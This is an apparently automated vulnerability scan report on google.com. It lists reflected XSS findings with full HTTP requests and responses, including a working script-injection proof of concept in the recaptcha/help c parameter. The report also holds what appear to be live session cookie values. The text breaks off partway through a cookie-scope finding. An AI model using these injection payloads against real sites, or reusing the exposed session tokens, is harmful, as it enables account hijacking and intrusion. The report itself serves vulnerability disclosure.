XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, google.com, Advanced Image Search
Report generated by XSS.Cx at Mon Jan 23 12:29:30 CST 2012.
1. Cross-site scripting (reflected)
1.1. http://www.google.com/advanced_image_search [gbv parameter]
1.2. http://www.google.com/advanced_image_search [hl parameter]
1.3. http://www.google.com/advanced_image_search [name of an arbitrarily supplied request parameter]
1.4. http://www.google.com/advanced_image_search [q parameter]
1.5. http://www.google.com/advanced_image_search [tbm parameter]
1.6. http://www.google.com/advanced_image_search [tbo parameter]
1.7. http://www.google.com/advanced_image_search [tbs parameter]
1.8. http://www.google.com/recaptcha/help [c parameter]
2. Cookie scoped to parent domain
2.1. http://www.google.com/sorry/image
2.2. http://www.google.com/
2.3. http://www.google.com/advanced_image_search
2.4. http://www.google.com/gen_204
2.5. http://www.google.com/imghp
2.6. http://www.google.com/preferences
2.7. http://www.google.com/reviews/scripts/annotations_bootstrap.js
2.8. http://www.google.com/search
2.9. http://www.google.com/webhp
3. Cookie without HttpOnly flag set
3.1. http://www.google.com/sorry/image
3.2. http://www.google.com/
3.3. http://www.google.com/advanced_image_search
3.4. http://www.google.com/gen_204
3.5. http://www.google.com/imghp
3.6. http://www.google.com/preferences
3.7. http://www.google.com/reviews/scripts/annotations_bootstrap.js
3.8. http://www.google.com/search
3.9. http://www.google.com/webhp
4. Source code disclosure
5. Cross-domain Referer leakage
5.1. http://www.google.com/advanced_image_search
5.2. http://www.google.com/finance
5.3. http://www.google.com/finance
5.4. http://www.google.com/imghp
5.5. http://www.google.com/prdhp
5.6. http://www.google.com/preferences
5.7. http://www.google.com/support/accounts/bin/answer.py
5.8. http://www.google.com/support/accounts/bin/answer.py
5.9. http://www.google.com/support/accounts/bin/answer.py
5.10. http://www.google.com/webhp
6. Cross-domain script include
6.1. http://www.google.com/accounts/TOS
6.2. http://www.google.com/support/accounts/bin/answer.py
6.3. http://www.google.com/webelements/
7. Email addresses disclosed
7.1. http://www.google.com/recaptcha/learnmore
7.2. http://www.google.com/webelements/
8. Credit card numbers disclosed
9. HTML does not specify charset
9.1. http://www.google.com/intl/en/privacy/
9.2. http://www.google.com/logos/2011/thanksgiving.html
9.3. http://www.google.com/recaptcha
9.4. http://www.google.com/recaptcha/api/noscript
9.5. http://www.google.com/recaptcha/demo/
9.6. http://www.google.com/recaptcha/mailhide/d
9.7. http://www.google.com/webmasters/
1. Cross-site scripting (reflected)
next
There are 8 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.google.com/advanced_image_search [gbv parameter]
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the gbv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91ade(a)5a14d8b14ee was submitted in the gbv parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dork&hl=en&gbv=291ade(a)5a14d8b14ee&tbs=qdr:d&tbm=isch&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:40 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=7236d76598c09c7e:FF=0:TM=1323156700:LM=1323156700:S=igyIdyP6eIkfVQ7t; expires=Thu, 05-Dec-2013 07:31:40 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... 'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dork\x26amp;hl\x3den\x26amp;gbv\x3d291ade(a)5a14d8b14ee\x26amp;tbs\x3dqdr:d\x26amp;tbm\x3disch\x26amp;tbo\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.2. http://www.google.com/advanced_image_search [hl parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb064(a)2b160856603 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dork&hl=eneb064(a)2b160856603&gbv=2&tbs=qdr:d&tbm=isch&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:38 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=007a23ae58272f0a:FF=0:TM=1323156698:LM=1323156698:S=WTGPGmFYdI_7PaLC; expires=Thu, 05-Dec-2013 07:31:38 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... ,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dork\x26amp;hl\x3deneb064(a)2b160856603\x26amp;gbv\x3d2\x26amp;tbs\x3dqdr:d\x26amp;tbm\x3disch\x26amp;tbo\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.3. http://www.google.com/advanced_image_search [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7fe11(a)8100dd6e4c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?7fe11(a)8100dd6e4c4=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:35 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=b3668dea2d77416f:FF=0:TM=1323156695:LM=1323156695:S=T09TCQ1Qu17IT9pE; expires=Thu, 05-Dec-2013 07:31:35 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... );})(); ;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?7fe11(a)8100dd6e4c4\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.4. http://www.google.com/advanced_image_search [q parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a5028(a)a236c739de2 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dorka5028(a)a236c739de2&hl=en&gbv=2&tbs=qdr:d&tbm=isch&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:36 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=cfe5c5d043699344:FF=0:TM=1323156696:LM=1323156696:S=StUVI6u3145qpCbS; expires=Thu, 05-Dec-2013 07:31:36 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... h(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dorka5028(a)a236c739de2\x26amp;hl\x3den\x26amp;gbv\x3d2\x26amp;tbs\x3dqdr:d\x26amp;tbm\x3disch\x26amp;tbo\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.5. http://www.google.com/advanced_image_search [tbm parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the tbm request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cd93e(a)e027e0fe952 was submitted in the tbm parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dork&hl=en&gbv=2&tbs=qdr:d&tbm=ischcd93e(a)e027e0fe952&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:43 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=84b737b760b63b0b:FF=0:TM=1323156703:LM=1323156703:S=B-GiYKcg_-25d-Z7; expires=Thu, 05-Dec-2013 07:31:43 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... nit');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dork\x26amp;hl\x3den\x26amp;gbv\x3d2\x26amp;tbs\x3dqdr:d\x26amp;tbm\x3dischcd93e(a)e027e0fe952\x26amp;tbo\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.6. http://www.google.com/advanced_image_search [tbo parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the tbo request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 58846(a)1998501d819 was submitted in the tbo parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dork&hl=en&gbv=2&tbs=qdr:d&tbm=isch&tbo=158846(a)1998501d819 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:43 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=6da429bd052b5a92:FF=0:TM=1323156703:LM=1323156703:S=IWLOVDMSHt5htB3D; expires=Thu, 05-Dec-2013 07:31:43 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... tHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dork\x26amp;hl\x3den\x26amp;gbv\x3d2\x26amp;tbs\x3dqdr:d\x26amp;tbm\x3disch\x26amp;tbo\x3d158846(a)1998501d819')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.7. http://www.google.com/advanced_image_search [tbs parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The value of the tbs request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb862(a)9ea965fcffb was submitted in the tbs parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_image_search?q=sqli+dork&hl=en&gbv=2&tbs=qdr:deb862(a)9ea965fcffb&tbm=isch&tbo=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:42 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=41e6bc59fd3a7e62:FF=0:TM=1323156702:LM=1323156702:S=WNTH1-PUEJ6CnDw2; expires=Thu, 05-Dec-2013 07:31:42 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]... .med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_image_search?q\x3dsqli+dork\x26amp;hl\x3den\x26amp;gbv\x3d2\x26amp;tbs\x3dqdr:deb862(a)9ea965fcffb\x26amp;tbm\x3disch\x26amp;tbo\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script> ...[SNIP]...
|
1.8. http://www.google.com/recaptcha/help [c parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/recaptcha/help |
Issue detail
The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 246f4'><script>alert(1)</script>d60cda5d2ef was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha/help?c=246f4'><script>alert(1)</script>d60cda5d2ef HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Dec 2011 05:28:42 GMT Expires: Tue, 06 Dec 2011 05:28:42 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head><title>Contact Us</title> <link rel="stylesheet" href="/recaptcha/mailhide/shared-media/styles.css" type="text/css"> <link rel="shortcut icon" href="/recaptcha/mailhide/shared-media/favico ...[SNIP]... <a id='morehelp' href='/recaptcha/help/feedback?c=246f4'><script>alert(1)</script>d60cda5d2ef'> ...[SNIP]...
|
2. Cookie scoped to parent domain
previous
next
There are 9 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
2.1. http://www.google.com/sorry/image
previous
next
Summary
Severity: |
Low |
Confidence: |
Firm |
Host: |
http://www.google.com |
Path: |
/sorry/image |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- GDSESS=ID=74cf1763b3bbbbaf:TM=1323154164:C=c:IP=174.36.218.2-:S=ADSvE-d0LSvK62oqpjOZgRrt0uRcrK7IvA; path=/; domain=google.com; expires=Tue, 06-Dec-2011 09:49:24 GMT
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sorry/image?id=12411461530739070132&hl=en HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com/sorry/?continue=http://www.google.com/search%3Fq%3Dsqli%2Bdork%26hl%3Den%26tbo%3D1%26gbv%3D2%26tbs%3Dqdr:d%26tbm%3Dnws%26sa%3DX%26ei%3DVLndTqK-O6nX0QHcusXIBw%26ved%3D0CBQQpwUoAw Cookie: PREF=ID=810b7e02f363f054:U=b71d815a5621c71c:FF=0:TM=1323101452:LM=1323153709:S=Ke1s7Rrx66OSu7aG; NID=53=aFV4Q7lzlA4g6hZ9Rki3DYK8hz1kGzocOZJI_w6eu6JH96dgw9nfloRt3_epIdfu1eIfKEVGXPRaSeg1Gk3GPPiFOlJXq1zd78kLwVzQe98Ltf17rS5LHcjEaSV7RjqH; SID=DQAAAN4AAABOxcVOIe64XB4IDSBk50we4ADMhkfgwJ24ZFchXWED5m9jgoUCD-gzNoxTvoa7L8sT3kcKU21dRS7G-mfY_oNuln-d04c_vYrXYg6DOfgbePnpZGg0HjXXRHklNUIngxWRXfJDliGBCr6E7fsnNy0KZCYhEPWiD58sxgfliIu0ZdMb-I_76fh5GqJflIw10c4o33gacknvYck2VX0OBDtsqzrrswhFW83K-Feh0RR1oG1-vK1FKycexSutDkT58OJCM73iPrteYQHzMQpskrwwNyNU8W5iwW4FONtbnZnFpA; HSID=AkB-N4ozDLm5DGQwb; APISID=R5nZIIrTQ8g_RUzK/A-Dgpt3yN1aY4sHSD
|
Response
HTTP/1.1 200 OK Content-Type: image/jpeg Set-Cookie: GDSESS=ID=74cf1763b3bbbbaf:TM=1323154164:C=c:IP=174.36.218.2-:S=ADSvE-d0LSvK62oqpjOZgRrt0uRcrK7IvA; path=/; domain=google.com; expires=Tue, 06-Dec-2011 09:49:24 GMT Date: Tue, 06 Dec 2011 06:49:24 GMT Server: HTTP server (unknown) Content-Length: 2991 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Expires: Tue, 06 Dec 2011 06:49:24 GMT Cache-Control: private
......JFIF..............128607e2cdfc6a5b....C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......F...."......... ...[SNIP]...
|
2.2. http://www.google.com/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/ |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=573005efdace859a:FF=0:TM=1323156655:LM=1323156655:S=WlQQNHmzXAWs6Rn1; expires=Thu, 05-Dec-2013 07:30:55 GMT; path=/; domain=.google.com
- NID=53=i-HZlgIBqvU9fnl1F4dnNL2PiBe8Eydkr9vjP7FEUT5iJQW_pwITkBP4azjBVQoB-yOnrkc2vOMhuD3ai0EUCv-OFETABLEkc9vnxA_rVikvNoUHAWoPDryUpnBlnx9Y; expires=Wed, 06-Jun-2012 07:30:55 GMT; path=/; domain=.google.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:30:55 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=573005efdace859a:FF=0:TM=1323156655:LM=1323156655:S=WlQQNHmzXAWs6Rn1; expires=Thu, 05-Dec-2013 07:30:55 GMT; path=/; domain=.google.com Set-Cookie: NID=53=i-HZlgIBqvU9fnl1F4dnNL2PiBe8Eydkr9vjP7FEUT5iJQW_pwITkBP4azjBVQoB-yOnrkc2vOMhuD3ai0EUCv-OFETABLEkc9vnxA_rVikvNoUHAWoPDryUpnBlnx9Y; expires=Wed, 06-Jun-2012 07:30:55 GMT; path=/; domain=.google.com; HttpOnly Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Search the world's information, including webpages, images, videos a ...[SNIP]...
|
2.3. http://www.google.com/advanced_image_search
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/advanced_image_search |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=301685694bc7a5cf:FF=0:TM=1323156693:LM=1323156693:S=IkR5W9Yz3pCk62u1; expires=Thu, 05-Dec-2013 07:31:33 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /advanced_image_search HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Date: Tue, 06 Dec 2011 07:31:33 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=301685694bc7a5cf:FF=0:TM=1323156693:LM=1323156693:S=IkR5W9Yz3pCk62u1; expires=Thu, 05-Dec-2013 07:31:33 GMT; path=/; domain=.google.com Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Image Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visite ...[SNIP]...
|
2.4. http://www.google.com/gen_204
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/gen_204 |
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=cf6bfeeb713e3477:FF=0:TM=1323156680:LM=1323156680:S=Rm2hZ06UUsGbWamx; expires=Thu, 05-Dec-2013 07:31:20 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gen_204?atyp=i&zx= HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=cf6bfeeb713e3477:FF=0:TM=1323156680:LM=1323156680:S=Rm2hZ06UUsGbWamx; expires=Thu, 05-Dec-2013 07:31:20 GMT; path=/; domain=.google.com Date: Tue, 06 Dec 2011 07:31:20 GMT Server: gws Content-Length: 0 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close
|
2.5. http://www.google.com/imghp
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://www.google.com |
Path: |
/imghp |
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:- PREF=ID=223135319ea33765:FF=0:TM=1323156681:LM=1323156681:S=3l98eGxGiMROcvRp; expires=Thu, 05-Dec-2013 07:31:21 GMT; path=/; domain=.google.com
- NID=53=Vtv_QV1Q6UxHxQWo466-JEjlo15roTKfIYGgrysBsZ4OALdB1cq5hsfsXZyPksFy2l3RPqyJhxCXkhBEG2uxvo872Qu9ME9W7G75hdhJf3XW8upz1n4ii6n6vW_owITy; expires=Wed, 06-Jun-2012 07:31:21 GMT; path=/; domain=.google.com; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /imghp HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
